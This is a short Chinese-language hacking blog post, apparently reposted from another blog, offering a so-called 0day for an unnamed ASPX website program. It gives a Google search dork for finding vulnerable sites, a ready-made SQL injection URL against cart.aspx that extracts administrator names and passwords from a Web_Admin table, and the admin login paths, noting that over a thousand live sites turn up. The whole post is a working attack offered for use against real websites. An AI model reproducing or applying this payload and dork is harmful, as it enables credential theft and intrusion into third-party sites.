Gh0st97′Blog 关注网络安全!

有一种格局叫做政治,有一种热情叫做战争,有一种抵抗叫做暴力,有一种信仰叫
“V”!


邮箱:670564720@qq.com
Qq:670564720

aspx网站程序的oday


直接爆出管理密码。 

也是利用注入漏洞。 
谷歌搜索关键字:inurl:scoreindex.aspx

利用代码 

cart.aspx?act=buy&id=1 and (Select Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 4 [Name],[Pass] From [Web_Admin] Where 1=1 Order by [Name],[Pass]) T Order by [Name] desc,[Pass] desc)>0 -- 



后台地址:/weblogin/Login.aspx
后台地址/weblogin/index.aspx
这个oday出来也有一段时间了。搜索一下也有1300多个搜索结果。


来源:L0s4r's blog 关注网络安全!

Hack By LOs4r 漏洞 Oday 网络安全 渗透 转载自:ID481898477  
评论
热度(1)

© Gh0st97′Blog 关注网络安全! | Powered by LOFTER